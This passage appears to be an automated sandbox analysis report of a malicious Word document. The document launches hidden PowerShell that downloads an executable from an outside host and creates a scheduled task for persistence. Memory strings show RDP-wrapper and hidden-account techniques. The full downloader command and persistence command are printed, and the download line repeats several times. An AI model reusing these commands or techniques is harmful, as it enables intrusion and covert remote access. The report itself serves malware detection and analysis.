          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: C:\Windows\assembly\GAC_32\mscorlib\2.0.0.0__b77a5c561934e089\sorttbls.nlp
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: C:\Windows\assembly\GAC_32\mscorlib\2.0.0.0__b77a5c561934e089\sortkey.nlp
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: C:\Windows\assembly\NativeImages_v2.0.50727_64\mscorlib\fe6ac93181b40a571892e14bfb9d65f2\mscorlib.ni.dll
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: C:\Windows\assembly\GAC_64\mscorlib\2.0.0.0__b77a5c561934e089\sorttbls.nlp
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: C:\Windows\assembly\GAC_64\mscorlib\2.0.0.0__b77a5c561934e089\sortkey.nlp
          Source: C:\Users\user\AppData\Roaming\explorer.exeSection loaded: C:\Windows\assembly\NativeImages_v4.0.30319_32\mscorlib\7582400666d289c016013ad0f6e0e3e6\mscorlib.ni.dll
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: C:\Windows\assembly\NativeImages_v2.0.50727_32\mscorlib\38bf604432e1a30c954b2ee40d6a2d1c\mscorlib.ni.dll
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: C:\Windows\assembly\GAC_32\mscorlib\2.0.0.0__b77a5c561934e089\sorttbls.nlp
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: C:\Windows\assembly\GAC_32\mscorlib\2.0.0.0__b77a5c561934e089\sortkey.nlp
          Source: C:\Users\user\AppData\Roaming\explorer.exeSection loaded: C:\Windows\assembly\NativeImages_v4.0.30319_32\mscorlib\7582400666d289c016013ad0f6e0e3e6\mscorlib.ni.dll
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: C:\Windows\assembly\NativeImages_v2.0.50727_32\mscorlib\38bf604432e1a30c954b2ee40d6a2d1c\mscorlib.ni.dll
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: C:\Windows\assembly\GAC_32\mscorlib\2.0.0.0__b77a5c561934e089\sorttbls.nlp
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: C:\Windows\assembly\GAC_32\mscorlib\2.0.0.0__b77a5c561934e089\sortkey.nlp
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeMutant created: \Sessions\1\BaseNamedObjects\Global\.net clr networking
          Source: C:\Users\user\AppData\Roaming\explorer.exeMutant created: \Sessions\1\BaseNamedObjects\Global\.net data provider for sqlserver
          Source: C:\Windows\System32\cmd.exeProcess created: C:\Users\user\AppData\Roaming\explorer.exe
          Source: C:\Windows\System32\cmd.exeProcess created: C:\Users\user\AppData\Roaming\explorer.exe
          Source: C:\Windows\System32\cmd.exeProcess created: C:\Users\user\AppData\Roaming\explorer.exe
          Source: C:\Windows\System32\cmd.exeProcess created: C:\Users\user\AppData\Roaming\explorer.exe
          Source: C:\Windows\System32\cmd.exeProcess created: C:\Users\user\AppData\Roaming\explorer.exe
          Source: C:\Windows\System32\cmd.exeProcess created: C:\Users\user\AppData\Roaming\explorer.exe
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile read: C:\Windows\System32\drivers\etc\hostsJump to behavior
          Source: Window RecorderWindow detected: More than 3 window changes detected
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\Microsoft.NET\Framework64\v2.0.50727\mscorrc.dll
          Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEKey opened: HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Word\Resiliency\StartupItems
          Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEFile opened: C:\Windows\WinSxS\amd64_microsoft.vc90.crt_1fc8b3b9a1e18e3b_9.0.30729.4940_none_08e4299fa83d7e3c\MSVCR90.dll
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeDirectory created: C:\Program Files\Microsoft DN1Jump to behavior
          Source: Binary string: mscorlib.pdb source: powershell.exe, 00000009.00000002.937314364.0000000001CA7000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 00000013.00000002.962927870.0000000001F04000.00000004.00000020.00020000.00000000.sdmp
          Source: Binary string: :\Windows\mscorlib.pdb source: powershell.exe, 00000009.00000002.937314364.0000000001CA7000.00000004.00000020.00020000.00000000.sdmp
          Source: Binary string: mscorlib.pdbment.Automation.pdbBB source: powershell.exe, 00000009.00000002.937314364.0000000001CA7000.00000004.00000020.00020000.00000000.sdmp
          Source: Binary string: m.Management.Automation.pdbpdbion.pdbAlbu source: powershell.exe, 00000009.00000002.937314364.0000000001CA7000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 00000013.00000002.962927870.0000000001F04000.00000004.00000020.00020000.00000000.sdmp
          Source: Binary string: scorlib.pdb source: powershell.exe, 00000009.00000002.937314364.0000000001CA7000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 00000013.00000002.962927870.0000000001F04000.00000004.00000020.00020000.00000000.sdmp
          Source: Binary string: :\Windows\dll\mscorlib.pdb source: powershell.exe, 00000009.00000002.937314364.0000000001CA7000.00000004.00000020.00020000.00000000.sdmp
          Source: Binary string: :\Windows\mscorlib.pdbXr`g source: powershell.exe, 00000013.00000002.962927870.0000000001F04000.00000004.00000020.00020000.00000000.sdmp
          Source: Binary string: f:\binaries\Intermediate\ndp_msbuild\xmakecommandline.csproj_1613737345\objr\x86\MSBuild.pdb source: MSBuild.exe, 0000001A.00000002.983934505.0000000003200000.00000004.00000800.00020000.00000000.sdmp
          Source: Binary string: mscorlib.pdbment.Automation.pdbBB[xp source: powershell.exe, 00000013.00000002.962927870.0000000001F04000.00000004.00000020.00020000.00000000.sdmp
          Source: Binary string: ws\dll\System.pdben source: powershell.exe, 00000009.00000002.937314364.0000000001CA7000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 00000013.00000002.962927870.0000000001F04000.00000004.00000020.00020000.00000000.sdmp
          Source: Binary string: C:\Windows\assembly\GAC_64\mscorlib\2.0.0.0__b77a5c561934e089\mscorlib.pdbn source: powershell.exe, 00000009.00000002.937314364.0000000001CA7000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 00000013.00000002.962927870.0000000001F04000.00000004.00000020.00020000.00000000.sdmp
          Source: Binary string: :\Windows\dll\mscorlib.pdbDr`g source: powershell.exe, 00000013.00000002.962927870.0000000001F04000.00000004.00000020.00020000.00000000.sdmp
          Source: Binary string: f:\binaries\Intermediate\ndp_msbuild\xmakecommandline.csproj_1613737345\objr\x86\MSBuild.pdbD source: MSBuild.exe, 0000001A.00000002.983934505.0000000003200000.00000004.00000800.00020000.00000000.sdmp
          Source: Binary string: C:\Windows\System.pdbUy source: powershell.exe, 00000013.00000002.962927870.0000000001F04000.00000004.00000020.00020000.00000000.sdmp
          Source: Binary string: C:\Windows\dll\System.Management.Automation.pdbmmon source: powershell.exe, 00000009.00000002.937314364.0000000001CA7000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 00000013.00000002.962927870.0000000001F04000.00000004.00000020.00020000.00000000.sdmp
          Source: Binary string: ws\mscorlib.pdbpdblib.pdb source: powershell.exe, 00000009.00000002.937314364.0000000001CA7000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 00000013.00000002.962927870.0000000001F04000.00000004.00000020.00020000.00000000.sdmp
          Source: Binary string: C:\Windows\symbols\dll\mscorlib.pdb source: powershell.exe, 00000009.00000002.937314364.0000000001CA7000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 00000013.00000002.962927870.0000000001F04000.00000004.00000020.00020000.00000000.sdmp
          Source: Binary string: C:\Windows\symbols\dll\System.Management.Automation.pdb Fil source: powershell.exe, 00000009.00000002.937314364.0000000001CA7000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 00000013.00000002.962927870.0000000001F04000.00000004.00000020.00020000.00000000.sdmp
          Source: Binary string: C:\Windows\System.Management.Automation.pdb source: powershell.exe, 00000009.00000002.937314364.0000000001CA7000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 00000013.00000002.962927870.0000000001F04000.00000004.00000020.00020000.00000000.sdmp
          Source: Binary string: C:\Windows\System.pdb source: powershell.exe, 00000009.00000002.937314364.0000000001CA7000.00000004.00000020.00020000.00000000.sdmp
          Source: ~WRF{C4F4A2E4-AFFD-48B2-B382-6AEAEB7457BF}.tmp.0.drInitial sample: OLE indicators vbamacros = False

          Data Obfuscation

          barindex
          Source: explorer[1].exe.0.dr, GUI/DangNhap.cs.Net Code: ResourceTemplateDefine System.Reflection.Assembly System.Reflection.Assembly::Load(System.Byte[])
          Source: explorer.exe.4.dr, GUI/DangNhap.cs.Net Code: ResourceTemplateDefine System.Reflection.Assembly System.Reflection.Assembly::Load(System.Byte[])
          Source: eDdYRRbouy.exe.8.dr, GUI/DangNhap.cs.Net Code: ResourceTemplateDefine System.Reflection.Assembly System.Reflection.Assembly::Load(System.Byte[])
          Source: 8.0.explorer.exe.1330000.0.unpack, GUI/DangNhap.cs.Net Code: ResourceTemplateDefine System.Reflection.Assembly System.Reflection.Assembly::Load(System.Byte[])
          Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -NoP -sta -NonI -W Hidden -ExecutionPolicy bypass -NoLogo -command "(New-Object System.Net.WebClient).DownloadFile('httP://login.929389.ankura.us/AwOgYiWG/explorer.exe','C:\Users\user\AppData\Roaming\explorer.exe')
          Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -NoP -sta -NonI -W Hidden -ExecutionPolicy bypass -NoLogo -command "(New-Object System.Net.WebClient).DownloadFile('httP://login.929389.ankura.us/AwOgYiWG/explorer.exe','C:\Users\user\AppData\Roaming\explorer.exe')
          Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -NoP -sta -NonI -W Hidden -ExecutionPolicy bypass -NoLogo -command "(New-Object System.Net.WebClient).DownloadFile('httP://login.929389.ankura.us/AwOgYiWG/explorer.exe','C:\Users\user\AppData\Roaming\explorer.exe')
          Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -NoP -sta -NonI -W Hidden -ExecutionPolicy bypass -NoLogo -command "(New-Object System.Net.WebClient).DownloadFile('httP://login.929389.ankura.us/AwOgYiWG/explorer.exe','C:\Users\user\AppData\Roaming\explorer.exe')
          Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -NoP -sta -NonI -W Hidden -ExecutionPolicy bypass -NoLogo -command "(New-Object System.Net.WebClient).DownloadFile('httP://login.929389.ankura.us/AwOgYiWG/explorer.exe','C:\Users\user\AppData\Roaming\explorer.exe')
          Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -NoP -sta -NonI -W Hidden -ExecutionPolicy bypass -NoLogo -command "(New-Object System.Net.WebClient).DownloadFile('httP://login.929389.ankura.us/AwOgYiWG/explorer.exe','C:\Users\user\AppData\Roaming\explorer.exe')
          Source: C:\Users\user\AppData\Roaming\explorer.exeCode function: 8_2_05893E1C push esi; ret
          Source: C:\Users\user\AppData\Roaming\explorer.exeCode function: 20_2_05F06979 push ebx; retn 0000h
          Source: C:\Users\user\AppData\Roaming\explorer.exeCode function: 20_2_05F06930 push ebx; retn 0000h
          Source: C:\Users\user\AppData\Roaming\explorer.exeCode function: 20_2_05F06C80 push ebp; retn 0000h
          Source: C:\Users\user\AppData\Roaming\explorer.exeCode function: 20_2_05F06850 push edx; retn 0000h
          Source: C:\Users\user\AppData\Roaming\explorer.exeCode function: 20_2_05F06808 push edx; retn 0000h
          Source: C:\Users\user\AppData\Roaming\explorer.exeCode function: 20_2_05F06AE0 push esp; retn 0000h
          Source: C:\Users\user\AppData\Roaming\explorer.exeCode function: 20_2_05F06A99 push esp; retn 0000h
          Source: C:\Users\user\AppData\Roaming\explorer.exeCode function: 20_2_05F03E1C push esi; ret
          Source: C:\Users\user\AppData\Roaming\explorer.exeCode function: 29_2_05503E1C push esi; ret
          Source: explorer[1].exe.0.drStatic PE information: 0xA015504D [Tue Feb 9 02:02:53 2055 UTC]

          Persistence and Installation Behavior

          barindex
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile created: C:\Users\user\AppData\Roaming\explorer.exeJump to dropped file
          Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -NoP -sta -NonI -W Hidden -ExecutionPolicy bypass -NoLogo -command "(New-Object System.Net.WebClient).DownloadFile('httP://login.929389.ankura.us/AwOgYiWG/explorer.exe','C:\Users\user\AppData\Roaming\explorer.exe')
          Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -NoP -sta -NonI -W Hidden -ExecutionPolicy bypass -NoLogo -command "(New-Object System.Net.WebClient).DownloadFile('httP://login.929389.ankura.us/AwOgYiWG/explorer.exe','C:\Users\user\AppData\Roaming\explorer.exe')
          Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -NoP -sta -NonI -W Hidden -ExecutionPolicy bypass -NoLogo -command "(New-Object System.Net.WebClient).DownloadFile('httP://login.929389.ankura.us/AwOgYiWG/explorer.exe','C:\Users\user\AppData\Roaming\explorer.exe')
          Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -NoP -sta -NonI -W Hidden -ExecutionPolicy bypass -NoLogo -command "(New-Object System.Net.WebClient).DownloadFile('httP://login.929389.ankura.us/AwOgYiWG/explorer.exe','C:\Users\user\AppData\Roaming\explorer.exe')
          Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -NoP -sta -NonI -W Hidden -ExecutionPolicy bypass -NoLogo -command "(New-Object System.Net.WebClient).DownloadFile('httP://login.929389.ankura.us/AwOgYiWG/explorer.exe','C:\Users\user\AppData\Roaming\explorer.exe')
          Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -NoP -sta -NonI -W Hidden -ExecutionPolicy bypass -NoLogo -command "(New-Object System.Net.WebClient).DownloadFile('httP://login.929389.ankura.us/AwOgYiWG/explorer.exe','C:\Users\user\AppData\Roaming\explorer.exe')
          Source: C:\Users\user\AppData\Roaming\explorer.exeFile created: C:\Users\user\AppData\Roaming\eDdYRRbouy.exeJump to dropped file
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile created: C:\Users\user\AppData\Roaming\explorer.exeJump to dropped file
          Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEFile created: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\ZAE7RW1P\explorer[1].exeJump to dropped file

          Boot Survival

          barindex
          Source: C:\Users\user\AppData\Roaming\explorer.exeProcess created: C:\Windows\SysWOW64\schtasks.exe C:\Windows\System32\schtasks.exe" /Create /TN "Updates\eDdYRRbouy" /XML "C:\Users\user\AppData\Local\Temp\tmpE14B.tmp

          Hooking and other Techniques for Hiding and Protection

          barindex
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeFile opened: C:\Windows\SysWOW64\:Zone.Identifier read attributes | delete
          Source: explorer.exe, 00000008.00000002.971704816.0000000003A0D000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\SpecialAccounts\UserList
          Source: explorer.exe, 00000008.00000002.971704816.0000000003A0D000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: UEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEETermService%ProgramFiles%%windir%\System32%ProgramW6432%\Microsoft DN1\rfxvmt.dll\rdpwrap.ini\sqlmap.dllrudprpdpSOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\SpecialAccounts\UserListSeDebugPrivilegeSYSTEM\CurrentControlSet\Services\TermService\ParametersServiceDllSYSTEM\CurrentControlSet\Services\TermServiceImagePathsvchost.exesvchost.exe -kCertPropSvcSessionEnvServicesActiveSYSTEM\CurrentControlSet\Control\Terminal ServerSYSTEM\CurrentControlSet\Control\Terminal Server\Licensing CoreSOFTWARE\Microsoft\Windows NT\CurrentVersion\WinlogonSYSTEM\CurrentControlSet\Control\Terminal Server\AddInsSYSTEM\CurrentControlSet\ControlTerminal Server\AddIns\Clip RedirectorSYSTEM\CurrentControlSet\Control\Terminal Server\AddIns\Dynamic VCfDenyTSConnectionsEnableConcurrentSessionsAllowMultipleTSSessionsRDPClipNameType
          Source: explorer.exe, 00000008.00000002.964367584.0000000002891000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\SpecialAccounts\UserList
          Source: explorer.exe, 00000008.00000002.964367584.0000000002891000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: UEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEETermService%ProgramFiles%%windir%\System32%ProgramW6432%\Microsoft DN1\rfxvmt.dll\rdpwrap.ini\sqlmap.dllrudprpdpSOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\SpecialAccounts\UserListSeDebugPrivilegeSYSTEM\CurrentControlSet\Services\TermService\ParametersServiceDllSYSTEM\CurrentControlSet\Services\TermServiceImagePathsvchost.exesvchost.exe -kCertPropSvcSessionEnvServicesActiveSYSTEM\CurrentControlSet\Control\Terminal ServerSYSTEM\CurrentControlSet\Control\Terminal Server\Licensing CoreSOFTWARE\Microsoft\Windows NT\CurrentVersion\WinlogonSYSTEM\CurrentControlSet\Control\Terminal Server\AddInsSYSTEM\CurrentControlSet\ControlTerminal Server\AddIns\Clip RedirectorSYSTEM\CurrentControlSet\Control\Terminal Server\AddIns\Dynamic VCfDenyTSConnectionsEnableConcurrentSessionsAllowMultipleTSSessionsRDPClipNameType
          Source: MSBuild.exe, 00000011.00000003.963529024.00000000006B1000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\SpecialAccounts\UserList
          Source: MSBuild.exe, 00000011.00000003.963529024.00000000006B1000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: UEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEETermService%ProgramFiles%%windir%\System32%ProgramW6432%\Microsoft DN1\rfxvmt.dll\rdpwrap.ini\sqlmap.dllrudprpdpSOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\SpecialAccounts\UserListSeDebugPrivilegeSYSTEM\CurrentControlSet\Services\TermService\ParametersServiceDllSYSTEM\CurrentControlSet\Services\TermServiceImagePathsvchost.exesvchost.exe -kCertPropSvcSessionEnvServicesActiveSYSTEM\CurrentControlSet\Control\Terminal ServerSYSTEM\CurrentControlSet\Control\Terminal Server\Licensing CoreSOFTWARE\Microsoft\Windows NT\CurrentVersion\WinlogonSYSTEM\CurrentControlSet\Control\Terminal Server\AddInsSYSTEM\CurrentControlSet\ControlTerminal Server\AddIns\Clip RedirectorSYSTEM\CurrentControlSet\Control\Terminal Server\AddIns\Dynamic VCfDenyTSConnectionsEnableConcurrentSessionsAllowMultipleTSSessionsRDPClipNameType
          Source: MSBuild.exe, 00000011.00000000.956682708.0000000000414000.00000040.00000400.00020000.00000000.sdmpString found in binary or memory: SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\SpecialAccounts\UserList
          Source: MSBuild.exe, 00000011.00000000.956682708.0000000000414000.00000040.00000400.00020000.00000000.sdmpString found in binary or memory: UEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEETermService%ProgramFiles%%windir%\System32%ProgramW6432%\Microsoft DN1\rfxvmt.dll\rdpwrap.ini\sqlmap.dllrudprpdpSOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\SpecialAccounts\UserListSeDebugPrivilegeSYSTEM\CurrentControlSet\Services\TermService\ParametersServiceDllSYSTEM\CurrentControlSet\Services\TermServiceImagePathsvchost.exesvchost.exe -kCertPropSvcSessionEnvServicesActiveSYSTEM\CurrentControlSet\Control\Terminal ServerSYSTEM\CurrentControlSet\Control\Terminal Server\Licensing CoreSOFTWARE\Microsoft\Windows NT\CurrentVersion\WinlogonSYSTEM\CurrentControlSet\Control\Terminal Server\AddInsSYSTEM\CurrentControlSet\ControlTerminal Server\AddIns\Clip RedirectorSYSTEM\CurrentControlSet\Control\Terminal Server\AddIns\Dynamic VCfDenyTSConnectionsEnableConcurrentSessionsAllowMultipleTSSessionsRDPClipNameType
          Source: MSBuild.exe, 00000011.00000003.963466175.00000000006A5000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\SpecialAccounts\UserList
          Source: MSBuild.exe, 00000011.00000003.963466175.00000000006A5000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: UEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEETermService%ProgramFiles%%windir%\System32%ProgramW6432%\Microsoft DN1\rfxvmt.dll\rdpwrap.ini\sqlmap.dllrudprpdpSOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\SpecialAccounts\UserListSeDebugPrivilegeSYSTEM\CurrentControlSet\Services\TermService\ParametersServiceDllSYSTEM\CurrentControlSet\Services\TermServiceImagePathsvchost.exesvchost.exe -kCertPropSvcSessionEnvServicesActiveSYSTEM\CurrentControlSet\Control\Terminal ServerSYSTEM\CurrentControlSet\Control\Terminal Server\Licensing CoreSOFTWARE\Microsoft\Windows NT\CurrentVersion\WinlogonSYSTEM\CurrentControlSet\Control\Terminal Server\AddInsSYSTEM\CurrentControlSet\ControlTerminal Server\AddIns\Clip RedirectorSYSTEM\CurrentControlSet\Control\Terminal Server\AddIns\Dynamic VCfDenyTSConnectionsEnableConcurrentSessionsAllowMultipleTSSessionsRDPClipNameType
          Source: MSBuild.exe, 00000011.00000003.963980442.00000000006B7000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\SpecialAccounts\UserList
          Source: MSBuild.exe, 00000011.00000003.963980442.00000000006B7000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: UEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEETermService%ProgramFiles%%windir%\System32%ProgramW6432%\Microsoft DN1\rfxvmt.dll\rdpwrap.ini\sqlmap.dllrudprpdpSOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\SpecialAccounts\UserListSeDebugPrivilegeSYSTEM\CurrentControlSet\Services\TermService\ParametersServiceDllSYSTEM\CurrentControlSet\Services\TermServiceImagePathsvchost.exesvchost.exe -kCertPropSvcSessionEnvServicesActiveSYSTEM\CurrentControlSet\Control\Terminal ServerSYSTEM\CurrentControlSet\Control\Terminal Server\Licensing CoreSOFTWARE\Microsoft\Windows NT\CurrentVersion\WinlogonSYSTEM\CurrentControlSet\Control\Terminal Server\AddInsSYSTEM\CurrentControlSet\ControlTerminal Server\AddIns\Clip RedirectorSYSTEM\CurrentControlSet\Control\Terminal Server\AddIns\Dynamic VCfDenyTSConnectionsEnableConcurrentSessionsAllowMultipleTSSessionsRDPClipNameType
          Source: explorer.exe, 00000014.00000002.985267506.000000000289A000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\SpecialAccounts\UserList
          Source: explorer.exe, 00000014.00000002.985267506.000000000289A000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: UEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEEETermService%ProgramFiles%%windir%\System32%ProgramW6432%\Microsoft DN1\rfxvmt.dll\rdpwrap.ini\sqlmap.dllrudprpdpSOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\SpecialAccounts\UserListSeDebugPrivilegeSYSTEM\CurrentControlSet\Services\TermService\ParametersServiceDllSYSTEM\CurrentControlSet\Services\TermServiceImagePathsvchost.exesvchost.exe -kCertPropSvcSessionEnvServicesActiveSYSTEM\CurrentControlSet\Control\Terminal ServerSYSTEM\CurrentControlSet\Control\Terminal Server\Licensing CoreSOFTWARE\Microsoft\Windows NT\CurrentVersion\WinlogonSYSTEM\CurrentControlSet\Control\Terminal Server\AddInsSYSTEM\CurrentControlSet\ControlTerminal Server\AddIns\Clip RedirectorSYSTEM\CurrentControlSet\Control\Terminal Server\AddIns\Dynamic VCfDenyTSConnectionsEnableConcurrentSessionsAllowMultipleTSSessionsRDPClipNameType
